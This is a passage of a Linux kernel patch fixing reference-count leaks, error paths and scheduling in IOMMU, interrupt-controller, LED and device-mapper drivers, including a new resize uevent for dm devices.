++						   PCI_FUNC(devid), domain_id);
++				goto out;
++			}
++
+ 			if (!report_iommu_fault(&dev_data->domain->domain,
+ 						&pdev->dev, address,
+ 						IS_WRITE_REQUEST(flags) ?
+@@ -1702,27 +1711,29 @@ static int pdev_pri_ats_enable(struct pci_dev *pdev)
+ 	/* Only allow access to user-accessible pages */
+ 	ret = pci_enable_pasid(pdev, 0);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* First reset the PRI state of the device */
+ 	ret = pci_reset_pri(pdev);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	/* Enable PRI */
+ 	/* FIXME: Hardcode number of outstanding requests for now */
+ 	ret = pci_enable_pri(pdev, 32);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	ret = pci_enable_ats(pdev, PAGE_SHIFT);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pri;
+ 
+ 	return 0;
+ 
+-out_err:
++out_err_pri:
+ 	pci_disable_pri(pdev);
++
++out_err_pasid:
+ 	pci_disable_pasid(pdev);
+ 
+ 	return ret;
+@@ -2159,6 +2170,13 @@ static int amd_iommu_attach_device(struct iommu_domain *dom,
+ 	struct amd_iommu *iommu = rlookup_amd_iommu(dev);
+ 	int ret;
+ 
++	/*
++	 * Skip attach device to domain if new domain is same as
++	 * devices current domain
++	 */
++	if (dev_data->domain == domain)
++		return 0;
++
+ 	dev_data->defer_attach = false;
+ 
+ 	if (dev_data->domain)
+@@ -2387,12 +2405,17 @@ static int amd_iommu_def_domain_type(struct device *dev)
+ 		return 0;
+ 
+ 	/*
+-	 * Do not identity map IOMMUv2 capable devices when memory encryption is
+-	 * active, because some of those devices (AMD GPUs) don't have the
+-	 * encryption bit in their DMA-mask and require remapping.
++	 * Do not identity map IOMMUv2 capable devices when:
++	 *  - memory encryption is active, because some of those devices
++	 *    (AMD GPUs) don't have the encryption bit in their DMA-mask
++	 *    and require remapping.
++	 *  - SNP is enabled, because it prohibits DTE[Mode]=0.
+ 	 */
+-	if (!cc_platform_has(CC_ATTR_MEM_ENCRYPT) && dev_data->iommu_v2)
++	if (dev_data->iommu_v2 &&
++	    !cc_platform_has(CC_ATTR_MEM_ENCRYPT) &&
++	    !amd_iommu_snp_en) {
+ 		return IOMMU_DOMAIN_IDENTITY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iommu/exynos-iommu.c b/drivers/iommu/exynos-iommu.c
+index b0cde22119875..c1d579c24740b 100644
+--- a/drivers/iommu/exynos-iommu.c
++++ b/drivers/iommu/exynos-iommu.c
+@@ -1446,7 +1446,7 @@ static int __init exynos_iommu_init(void)
+ 
+ 	return 0;
+ err_reg_driver:
+-	platform_driver_unregister(&exynos_sysmmu_driver);
++	kmem_cache_free(lv2table_kmem_cache, zero_lv2_table);
+ err_zero_lv2:
+ 	kmem_cache_destroy(lv2table_kmem_cache);
+ 	return ret;
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 59df7e42fd533..52afcdaf7c7f1 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -4005,7 +4005,8 @@ int __init intel_iommu_init(void)
+ 		 * is likely to be much lower than the overhead of synchronizing
+ 		 * the virtual and physical IOMMU page-tables.
+ 		 */
+-		if (cap_caching_mode(iommu->cap)) {
++		if (cap_caching_mode(iommu->cap) &&
++		    !first_level_by_default(IOMMU_DOMAIN_DMA)) {
+ 			pr_info_once("IOMMU batching disallowed due to virtualization\n");
+ 			iommu_set_dma_strict();
+ 		}
+@@ -4346,7 +4347,12 @@ static size_t intel_iommu_unmap(struct iommu_domain *domain,
+ 	if (dmar_domain->max_addr == iova + size)
+ 		dmar_domain->max_addr = iova;
+ 
+-	iommu_iotlb_gather_add_page(domain, gather, iova, size);
++	/*
++	 * We do not use page-selective IOTLB invalidation in flush queue,
++	 * so there is no need to track page and sync iotlb.
++	 */
++	if (!iommu_iotlb_gather_queued(gather))
++		iommu_iotlb_gather_add_page(domain, gather, iova, size);
+ 
+ 	return size;
+ }
+@@ -4642,8 +4648,12 @@ static int intel_iommu_enable_sva(struct device *dev)
+ 		return -EINVAL;
+ 
+ 	ret = iopf_queue_add_device(iommu->iopf_queue, dev);
+-	if (!ret)
+-		ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		return ret;
++
++	ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		iopf_queue_remove_device(iommu->iopf_queue, dev);
+ 
+ 	return ret;
+ }
+@@ -4655,8 +4665,12 @@ static int intel_iommu_disable_sva(struct device *dev)
+ 	int ret;
+ 
+ 	ret = iommu_unregister_device_fault_handler(dev);
+-	if (!ret)
+-		ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		return ret;
++
++	ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index fb3c7020028d0..9d2f05cf61648 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -128,6 +128,9 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	pasid_table->max_pasid = 1 << (order + PAGE_SHIFT + 3);
+ 	info->pasid_table = pasid_table;
+ 
++	if (!ecap_coherent(info->iommu->ecap))
++		clflush_cache_range(pasid_table->table, size);
++
+ 	return 0;
+ }
+ 
+@@ -215,6 +218,10 @@ retry:
+ 			free_pgtable_page(entries);
+ 			goto retry;
+ 		}
++		if (!ecap_coherent(info->iommu->ecap)) {
++			clflush_cache_range(entries, VTD_PAGE_SIZE);
++			clflush_cache_range(&dir[dir_index].val, sizeof(*dir));
++		}
+ 	}
+ 
+ 	return &entries[index];
+@@ -364,6 +371,16 @@ static inline void pasid_set_page_snoop(struct pasid_entry *pe, bool value)
+ 	pasid_set_bits(&pe->val[1], 1 << 23, value << 23);
+ }
+ 
++/*
++ * Setup No Execute Enable bit (Bit 133) of a scalable mode PASID
++ * entry. It is required when XD bit of the first level page table
++ * entry is about to be set.
++ */
++static inline void pasid_set_nxe(struct pasid_entry *pe)
++{
++	pasid_set_bits(&pe->val[2], 1 << 5, 1 << 5);
++}
++
+ /*
+  * Setup the Page Snoop (PGSNP) field (Bit 88) of a scalable mode
+  * PASID entry.
+@@ -557,6 +574,7 @@ int intel_pasid_setup_first_level(struct intel_iommu *iommu,
+ 	pasid_set_domain_id(pte, did);
+ 	pasid_set_address_width(pte, iommu->agaw);
+ 	pasid_set_page_snoop(pte, !!ecap_smpwc(iommu->ecap));
++	pasid_set_nxe(pte);
+ 
+ 	/* Setup Present and PASID Granular Transfer Type: */
+ 	pasid_set_translation_type(pte, PASID_ENTRY_PGTT_FL_ONLY);
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 5f6a85aea501e..50d858f36a81b 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -774,12 +774,16 @@ struct iommu_group *iommu_group_alloc(void)
+ 
+ 	ret = iommu_group_create_file(group,
+ 				      &iommu_group_attr_reserved_regions);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	ret = iommu_group_create_file(group, &iommu_group_attr_type);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	pr_debug("Allocated group %d\n", group->id);
+ 
+@@ -2124,8 +2128,22 @@ static int __iommu_attach_group(struct iommu_domain *domain,
+ 
+ 	ret = __iommu_group_for_each_dev(group, domain,
+ 					 iommu_group_do_attach_device);
+-	if (ret == 0)
++	if (ret == 0) {
+ 		group->domain = domain;
++	} else {
++		/*
++		 * To recover from the case when certain device within the
++		 * group fails to attach to the new domain, we need force
++		 * attaching all devices back to the old domain. The old
++		 * domain is compatible for all devices in the group,
++		 * hence the iommu driver should always return success.
++		 */
++		struct iommu_domain *old_domain = group->domain;
++
++		group->domain = NULL;
++		WARN(__iommu_group_set_domain(group, old_domain),
++		     "iommu driver failed to attach a compatible domain");
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iommu/iommufd/device.c b/drivers/iommu/iommufd/device.c
+index d81f93a321afc..f6f42d8bc8ad8 100644
+--- a/drivers/iommu/iommufd/device.c
++++ b/drivers/iommu/iommufd/device.c
+@@ -346,10 +346,6 @@ int iommufd_device_attach(struct iommufd_device *idev, u32 *pt_id)
+ 		rc = iommufd_device_do_attach(idev, hwpt);
+ 		if (rc)
+ 			goto out_put_pt_obj;
+-
+-		mutex_lock(&hwpt->ioas->mutex);
+-		list_add_tail(&hwpt->hwpt_item, &hwpt->ioas->hwpt_list);
+-		mutex_unlock(&hwpt->ioas->mutex);
+ 		break;
+ 	}
+ 	case IOMMUFD_OBJ_IOAS: {
+diff --git a/drivers/iommu/iommufd/main.c b/drivers/iommu/iommufd/main.c
+index 083e6fcbe10ad..3fbe636c3d8a6 100644
+--- a/drivers/iommu/iommufd/main.c
++++ b/drivers/iommu/iommufd/main.c
+@@ -252,9 +252,12 @@ union ucmd_buffer {
+ 	struct iommu_destroy destroy;
+ 	struct iommu_ioas_alloc alloc;
+ 	struct iommu_ioas_allow_iovas allow_iovas;
++	struct iommu_ioas_copy ioas_copy;
+ 	struct iommu_ioas_iova_ranges iova_ranges;
+ 	struct iommu_ioas_map map;
+ 	struct iommu_ioas_unmap unmap;
++	struct iommu_option option;
++	struct iommu_vfio_ioas vfio_ioas;
+ #ifdef CONFIG_IOMMUFD_TEST
+ 	struct iommu_test_cmd test;
+ #endif
+diff --git a/drivers/iommu/iommufd/vfio_compat.c b/drivers/iommu/iommufd/vfio_compat.c
+index 3ceca0e8311c3..dba88ee1d4571 100644
+--- a/drivers/iommu/iommufd/vfio_compat.c
++++ b/drivers/iommu/iommufd/vfio_compat.c
+@@ -381,7 +381,7 @@ static int iommufd_vfio_iommu_get_info(struct iommufd_ctx *ictx,
+ 	};
+ 	size_t minsz = offsetofend(struct vfio_iommu_type1_info, iova_pgsizes);
+ 	struct vfio_info_cap_header __user *last_cap = NULL;
+-	struct vfio_iommu_type1_info info;
++	struct vfio_iommu_type1_info info = {};
+ 	struct iommufd_ioas *ioas;
+ 	size_t total_cap_size;
+ 	int rc;
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index 5ddb8e578ac6a..fc1ef7de37973 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -199,6 +199,7 @@ static int alpine_msix_init_domains(struct alpine_msix_data *priv,
+ 	}
+ 
+ 	gic_domain = irq_find_host(gic_node);
++	of_node_put(gic_node);
+ 	if (!gic_domain) {
+ 		pr_err("Failed to find the GIC domain\n");
+ 		return -ENXIO;
+diff --git a/drivers/irqchip/irq-bcm7120-l2.c b/drivers/irqchip/irq-bcm7120-l2.c
+index bb6609cebdbce..1e9dab6e0d86f 100644
+--- a/drivers/irqchip/irq-bcm7120-l2.c
++++ b/drivers/irqchip/irq-bcm7120-l2.c
+@@ -279,7 +279,8 @@ static int __init bcm7120_l2_intc_probe(struct device_node *dn,
+ 		flags |= IRQ_GC_BE_IO;
+ 
+ 	ret = irq_alloc_domain_generic_chips(data->domain, IRQS_PER_WORD, 1,
+-				dn->full_name, handle_level_irq, clr, 0, flags);
++				dn->full_name, handle_level_irq, clr,
++				IRQ_LEVEL, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index e4efc08ac5948..091b0fe7e3242 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -161,6 +161,7 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 					  *init_params)
+ {
+ 	unsigned int clr = IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_NOAUTOEN;
++	unsigned int set = 0;
+ 	struct brcmstb_l2_intc_data *data;
+ 	struct irq_chip_type *ct;
+ 	int ret;
+@@ -208,9 +209,12 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 	if (IS_ENABLED(CONFIG_MIPS) && IS_ENABLED(CONFIG_CPU_BIG_ENDIAN))
+ 		flags |= IRQ_GC_BE_IO;
+ 
++	if (init_params->handler == handle_level_irq)
++		set |= IRQ_LEVEL;
++
+ 	/* Allocate a single Generic IRQ chip for this node */
+ 	ret = irq_alloc_domain_generic_chips(data->domain, 32, 1,
+-			np->full_name, init_params->handler, clr, 0, flags);
++			np->full_name, init_params->handler, clr, set, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-mvebu-gicp.c b/drivers/irqchip/irq-mvebu-gicp.c
+index fe88a782173dd..c43a345061d53 100644
+--- a/drivers/irqchip/irq-mvebu-gicp.c
++++ b/drivers/irqchip/irq-mvebu-gicp.c
+@@ -221,6 +221,7 @@ static int mvebu_gicp_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(irq_parent_dn);
++	of_node_put(irq_parent_dn);
+ 	if (!parent_domain) {
+ 		dev_err(&pdev->dev, "failed to find parent IRQ domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irq-ti-sci-intr.c b/drivers/irqchip/irq-ti-sci-intr.c
+index fe8fad22bcf96..020ddf29efb80 100644
+--- a/drivers/irqchip/irq-ti-sci-intr.c
++++ b/drivers/irqchip/irq-ti-sci-intr.c
+@@ -236,6 +236,7 @@ static int ti_sci_intr_irq_domain_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(parent_node);
++	of_node_put(parent_node);
+ 	if (!parent_domain) {
+ 		dev_err(dev, "Failed to find IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irqchip.c b/drivers/irqchip/irqchip.c
+index 3570f0a588c4b..7899607fbee8d 100644
+--- a/drivers/irqchip/irqchip.c
++++ b/drivers/irqchip/irqchip.c
+@@ -38,8 +38,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	struct device_node *par_np = of_irq_find_parent(np);
+ 	of_irq_init_cb_t irq_init_cb = of_device_get_match_data(&pdev->dev);
+ 
+-	if (!irq_init_cb)
++	if (!irq_init_cb) {
++		of_node_put(par_np);
+ 		return -EINVAL;
++	}
+ 
+ 	if (par_np == np)
+ 		par_np = NULL;
+@@ -52,8 +54,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	 * interrupt controller. The actual initialization callback of this
+ 	 * interrupt controller can check for specific domains as necessary.
+ 	 */
+-	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY))
++	if (par_np && !irq_find_matching_host(par_np, DOMAIN_BUS_ANY)) {
++		of_node_put(par_np);
+ 		return -EPROBE_DEFER;
++	}
+ 
+ 	return irq_init_cb(np, par_np);
+ }
+diff --git a/drivers/leds/led-class.c b/drivers/leds/led-class.c
+index 6a8ea94834fa3..aa39b2a48fdff 100644
+--- a/drivers/leds/led-class.c
++++ b/drivers/leds/led-class.c
+@@ -235,14 +235,17 @@ struct led_classdev *of_led_get(struct device_node *np, int index)
+ 
+ 	led_dev = class_find_device_by_of_node(leds_class, led_node);
+ 	of_node_put(led_node);
++	put_device(led_dev);
+ 
+ 	if (!led_dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 
+ 	led_cdev = dev_get_drvdata(led_dev);
+ 
+-	if (!try_module_get(led_cdev->dev->parent->driver->owner))
++	if (!try_module_get(led_cdev->dev->parent->driver->owner)) {
++		put_device(led_cdev->dev);
+ 		return ERR_PTR(-ENODEV);
++	}
+ 
+ 	return led_cdev;
+ }
+@@ -255,6 +258,7 @@ EXPORT_SYMBOL_GPL(of_led_get);
+ void led_put(struct led_classdev *led_cdev)
+ {
+ 	module_put(led_cdev->dev->parent->driver->owner);
++	put_device(led_cdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(led_put);
+ 
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index b2f4c4ec7c567..7c908414ac7e0 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -495,6 +495,11 @@ static inline int is31fl3196_db_to_gain(u32 dezibel)
+ 	return dezibel / IS31FL3196_AUDIO_GAIN_DB_STEP;
+ }
+ 
++static void is31f1319x_mutex_destroy(void *lock)
++{
++	mutex_destroy(lock);
++}
++
+ static int is31fl319x_probe(struct i2c_client *client)
+ {
+ 	struct is31fl319x_chip *is31;
+@@ -511,7 +516,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 		return -ENOMEM;
+ 
+ 	mutex_init(&is31->lock);
+-	err = devm_add_action(dev, (void (*)(void *))mutex_destroy, &is31->lock);
++	err = devm_add_action_or_reset(dev, is31f1319x_mutex_destroy, &is31->lock);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/leds/simple/simatic-ipc-leds-gpio.c b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+index 07f0d79d604d4..e8d329b5a68c3 100644
+--- a/drivers/leds/simple/simatic-ipc-leds-gpio.c
++++ b/drivers/leds/simple/simatic-ipc-leds-gpio.c
+@@ -77,6 +77,8 @@ static int simatic_ipc_leds_gpio_probe(struct platform_device *pdev)
+ 
+ 	switch (plat->devmode) {
+ 	case SIMATIC_IPC_DEVICE_127E:
++		if (!IS_ENABLED(CONFIG_PINCTRL_BROXTON))
++			return -ENODEV;
+ 		simatic_ipc_led_gpio_table = &simatic_ipc_led_gpio_table_127e;
+ 		break;
+ 	case SIMATIC_IPC_DEVICE_227G:
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index bb786c39545ec..19caaf684ee34 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1833,7 +1833,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 	c->shrinker.scan_objects = dm_bufio_shrink_scan;
+ 	c->shrinker.seeks = 1;
+ 	c->shrinker.batch = 0;
+-	r = register_shrinker(&c->shrinker, "md-%s:(%u:%u)", slab_name,
++	r = register_shrinker(&c->shrinker, "dm-bufio:(%u:%u)",
+ 			      MAJOR(bdev->bd_dev), MINOR(bdev->bd_dev));
+ 	if (r)
+ 		goto bad;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 84814e819e4c3..7887f99b82bd5 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -60,6 +60,14 @@ EXPORT_SYMBOL_GPL(btracker_create);
+ 
+ void btracker_destroy(struct background_tracker *b)
+ {
++	struct bt_work *w, *tmp;
++
++	BUG_ON(!list_empty(&b->issued));
++	list_for_each_entry_safe (w, tmp, &b->queued, list) {
++		list_del(&w->list);
++		kmem_cache_free(b->work_cache, w);
++	}
++
+ 	kmem_cache_destroy(b->work_cache);
+ 	kfree(b);
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 5e92fac90b675..17fde3e5a1f7b 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -1805,6 +1805,7 @@ static void process_deferred_bios(struct work_struct *ws)
+ 
+ 		else
+ 			commit_needed = process_bio(cache, bio) || commit_needed;
++		cond_resched();
+ 	}
+ 
+ 	if (commit_needed)
+@@ -1827,6 +1828,7 @@ static void requeue_deferred_bios(struct cache *cache)
+ 	while ((bio = bio_list_pop(&bios))) {
+ 		bio->bi_status = BLK_STS_DM_REQUEUE;
+ 		bio_endio(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -1867,6 +1869,8 @@ static void check_migrations(struct work_struct *ws)
+ 		r = mg_start(cache, op, NULL);
+ 		if (r)
+ 			break;
++
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 89fa7a68c6c42..335684a1aeaa5 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -303,9 +303,13 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ 	 */
+ 	bio_for_each_segment(bvec, bio, iter) {
+ 		if (bio_iter_len(bio, iter) > corrupt_bio_byte) {
+-			char *segment = (page_address(bio_iter_page(bio, iter))
+-					 + bio_iter_offset(bio, iter));
++			char *segment;
++			struct page *page = bio_iter_page(bio, iter);
++			if (unlikely(page == ZERO_PAGE(0)))
++				break;
++			segment = bvec_kmap_local(&bvec);
+ 			segment[corrupt_bio_byte] = fc->corrupt_bio_value;
++			kunmap_local(segment);
+ 			DMDEBUG("Corrupting data bio=%p by writing %u to byte %u "
+ 				"(rw=%c bi_opf=%u bi_sector=%llu size=%u)\n",
+ 				bio, fc->corrupt_bio_value, fc->corrupt_bio_byte,
+@@ -361,9 +365,11 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ 		/*
+ 		 * Corrupt matching writes.
+ 		 */
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == WRITE)) {
+-			if (all_corrupt_bio_flags_match(bio, fc))
+-				corrupt_bio_data(bio, fc);
++		if (fc->corrupt_bio_byte) {
++			if (fc->corrupt_bio_rw == WRITE) {
++				if (all_corrupt_bio_flags_match(bio, fc))
++					corrupt_bio_data(bio, fc);
++			}
+ 			goto map_bio;
+ 		}
+ 
+@@ -389,13 +395,14 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ 		return DM_ENDIO_DONE;
+ 
+ 	if (!*error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
+-		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+-		    all_corrupt_bio_flags_match(bio, fc)) {
+-			/*
+-			 * Corrupt successful matching READs while in down state.
+-			 */
+-			corrupt_bio_data(bio, fc);
+-
++		if (fc->corrupt_bio_byte) {
++			if ((fc->corrupt_bio_rw == READ) &&
++			    all_corrupt_bio_flags_match(bio, fc)) {
++				/*
++				 * Corrupt successful matching READs while in down state.
++				 */
++				corrupt_bio_data(bio, fc);
++			}
+ 		} else if (!test_bit(DROP_WRITES, &fc->flags) &&
+ 			   !test_bit(ERROR_WRITES, &fc->flags)) {
+ 			/*
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 36fc6ae4737a0..e031088ff15c6 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -482,7 +482,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		dm_table_event(table);
+ 	dm_put_live_table(hc->md, srcu_idx);
+ 
+-	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr))
++	if (!dm_kobject_uevent(hc->md, KOBJ_CHANGE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	md = hc->md;
+@@ -995,7 +995,7 @@ static int dev_remove(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 
+ 	dm_ima_measure_on_device_remove(md, false);
+ 
+-	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr))
++	if (!dm_kobject_uevent(md, KOBJ_REMOVE, param->event_nr, false))
+ 		param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 
+ 	dm_put(md);
+@@ -1129,6 +1129,7 @@ static int do_resume(struct dm_ioctl *param)
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
++	bool need_resize_uevent = false;
+ 
+ 	down_write(&_hash_lock);
+ 
+@@ -1149,6 +1150,8 @@ static int do_resume(struct dm_ioctl *param)
+ 
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
++		sector_t old_size, new_size;
++
+ 		/* Suspend if it isn't already suspended */
+ 		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+@@ -1157,6 +1160,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!dm_suspended_md(md))
+ 			dm_suspend(md, suspend_flags);
+ 
++		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+ 		if (IS_ERR(old_map)) {
+ 			dm_sync_table(md);
+@@ -1164,6 +1168,9 @@ static int do_resume(struct dm_ioctl *param)
+ 			dm_put(md);
+ 			return PTR_ERR(old_map);
+ 		}
++		new_size = dm_get_size(md);
++		if (old_size && new_size && old_size != new_size)
++			need_resize_uevent = true;
+ 
+ 		if (dm_table_get_mode(new_map) & FMODE_WRITE)
+ 			set_disk_ro(dm_disk(md), 0);
+@@ -1176,7 +1183,7 @@ static int do_resume(struct dm_ioctl *param)
+ 		if (!r) {
+ 			dm_ima_measure_on_device_resume(md, new_map ? true : false);
+ 
+-			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr))
++			if (!dm_kobject_uevent(md, KOBJ_CHANGE, param->event_nr, need_resize_uevent))
+ 				param->flags |= DM_UEVENT_GENERATED_FLAG;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 64cfcf46881dc..e4c1a8a21bbd0 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2207,6 +2207,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 			throttle_work_update(&pool->throttle);
+ 			dm_pool_issue_prefetches(pool->pmd);
+ 		}
++		cond_resched();
+ 	}
+ 	blk_finish_plug(&plug);
+ }
+@@ -2289,6 +2290,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 			else
+ 				pool->process_cell(tc, cell);
+ 		}
++		cond_resched();
+ 	} while (!list_empty(&cells));
+ }
+ 
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index 0278482fac94a..c795ea7da7917 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -2945,7 +2945,7 @@ int dmz_ctr_metadata(struct dmz_dev *dev, int num_dev,
+ 	zmd->mblk_shrinker.seeks = DEFAULT_SEEKS;
+ 
+ 	/* Metadata cache shrinker */
+-	ret = register_shrinker(&zmd->mblk_shrinker, "md-meta:(%u:%u)",
++	ret = register_shrinker(&zmd->mblk_shrinker, "dm-zoned-meta:(%u:%u)",
+ 				MAJOR(dev->bdev->bd_dev),
+ 				MINOR(dev->bdev->bd_dev));
+ 	if (ret) {
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index b424a6ee27baf..605662935ce91 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -231,7 +231,6 @@ out_uevent_exit:
+ 
+ static void local_exit(void)
+ {
+-	flush_scheduled_work();
+ 	destroy_workqueue(deferred_remove_workqueue);
+ 
+ 	unregister_blkdev(_major, _name);
+@@ -1008,6 +1007,7 @@ static void dm_wq_requeue_work(struct work_struct *work)
+ 		io->next = NULL;
+ 		__dm_io_complete(io, false);
+ 		io = next;
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2172,10 +2172,7 @@ static struct dm_table *__bind(struct mapped_device *md, struct dm_table *t,
+ 	if (size != dm_get_size(md))
+ 		memset(&md->geometry, 0, sizeof(md->geometry));
+ 
+-	if (!get_capacity(md->disk))
+-		set_capacity(md->disk, size);
+-	else
+-		set_capacity_and_notify(md->disk, size);
++	set_capacity(md->disk, size);
+ 
+ 	dm_table_event_callback(t, event_callback, md);
+ 
+@@ -2569,6 +2566,7 @@ static void dm_wq_work(struct work_struct *work)
+ 			break;
+ 
+ 		submit_bio_noacct(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2968,24 +2966,26 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		       unsigned cookie)
++		      unsigned cookie, bool need_resize_uevent)
+ {
+ 	int r;
+ 	unsigned noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+-	char *envp[] = { udev_cookie, NULL };
+-
+-	noio_flag = memalloc_noio_save();
+-
+-	if (!cookie)
+-		r = kobject_uevent(&disk_to_dev(md->disk)->kobj, action);
+-	else {
++	char *envp[3] = { NULL, NULL, NULL };
++	char **envpp = envp;
++	if (cookie) {
+ 		snprintf(udev_cookie, DM_COOKIE_LENGTH, "%s=%u",
+ 			 DM_COOKIE_ENV_VAR_NAME, cookie);
+-		r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj,
+-				       action, envp);
++		*envpp++ = udev_cookie;
++	}
++	if (need_resize_uevent) {
++		*envpp++ = "RESIZE=1";
+ 	}
+ 
++	noio_flag = memalloc_noio_save();
++
++	r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj, action, envp);
++
+ 	memalloc_noio_restore(noio_flag);
+ 
+ 	return r;
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index 5201df03ce402..a9a3ffcad084c 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
